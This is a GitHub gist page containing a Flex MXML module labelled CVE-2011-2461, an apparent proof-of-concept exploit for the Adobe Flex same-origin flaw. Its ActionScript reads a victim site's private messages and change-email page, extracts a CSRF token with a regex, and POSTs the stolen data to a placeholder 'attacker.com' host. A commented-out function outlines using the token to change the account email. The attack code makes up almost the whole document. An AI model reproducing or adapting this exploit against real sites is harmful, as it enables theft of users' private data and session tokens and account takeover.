Skip to content

Instantly share code, notes, and snippets.

@pwneddesal

pwneddesal/CVE-2011-2461.MXML

Last active May 23, 2017 03:10
Show Gist options
  • Save pwneddesal/6ec49529d2f5f7ac23634059147b9edb to your computer and use it in GitHub Desktop.
Save pwneddesal/6ec49529d2f5f7ac23634059147b9edb to your computer and use it in GitHub Desktop.
Download ZIP
Raw
CVE-2011-2461.MXML
<?xml version="1.0" encoding="utf-8"?>
<mx:Module xmlns:fx="http://ns.adobe.com/mxml/2009"
xmlns:s="library://ns.adobe.com/flex/spark"
xmlns:mx="library://ns.adobe.com/flex/mx"
implements="interfaces.IModule1"
layout="vertical" width="100%" height="100%">
<fx:Script>
<![CDATA[
import contexts.Module1Context;
import flash.net.*
import by.blooddy.crypto.serialization.JSONer;
import interfaces.IModule1;
import org.robotlegs.core.IInjector;
import flash.text.TextField;
import flash.external.ExternalInterface;
private var context:Module1Context;
private var loader:URLLoader = new URLLoader();
//attacker domain here
private var attackerdomain:String = 'https://attacker.com';
[Inject]
public function set parentInjector(value:IInjector):void
{
context = new Module1Context(this, value);
}
public function dispose():void
{
}
//private function buttonClick():void {
// ExternalInterface.call('console.log(2)');
//}
private function ajaxbuttonClick(url:String):void
{
var _req:URLRequest = new URLRequest(url);
loader.addEventListener(Event.COMPLETE, _onCompleteJSON);
loader.load(_req);
}
private function extractClick(url:String):void
{
var _req:URLRequest = new URLRequest(url);
loader.addEventListener(Event.COMPLETE, _onComplete);
loader.load(_req);
}
private function readmessage():void
{
ajaxbuttonClick('https://www.VICTIM.com/callback/messages/show/VICTIMcom');
}
private function extract_token():void
{
extractClick('https://www.VICTIM.com/settings/change-email');
}
/**private function change_email():void
{
ExternalInterface.call('alert(1)');
urlRequest.data = 'POST_PARAMETER_HERE&user_settings_change_email[_token]=' + extract_token() ;
urlRequest.method = 'POST';
loader.addEventListener(Event.COMPLETE, shithappen);
loader.load(urlRequest);
}**/
private function shithappen():void
{
}
private function _onComplete(e:Event):void {
var str:String = loader.data;
var pattern:RegExp =/(_csrf_token" value="(.+)">)/g;
var results:Array = str.match(pattern);
ExternalInterface.call('alert', 'notjson');
ExternalInterface.call('alert', results[1].slice(20, 63));
senderinfo(results[1].slice(20, 63));
}
private function _onCompleteJSON(e:Event):void {
ExternalInterface.call('prompt', escape(loader.data));
senderinfo(escape(loader.data));
}
private function senderinfo(data:String):void{
var _req:URLRequest = new URLRequest(attackerdomain);
_req.method = 'POST';
_req.data=data
loader.addEventListener(Event.COMPLETE, function(event:Event):void {
ExternalInterface.call('console.log("info has been send to attacker domain")');
}
);
loader.load(_req);
}
]]>
</fx:Script>
<s:Button id="button" label="read message1" click="readmessage()" />
<s:Button id="button1" label="extract token" click="extract_token()" />
</mx:Module>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment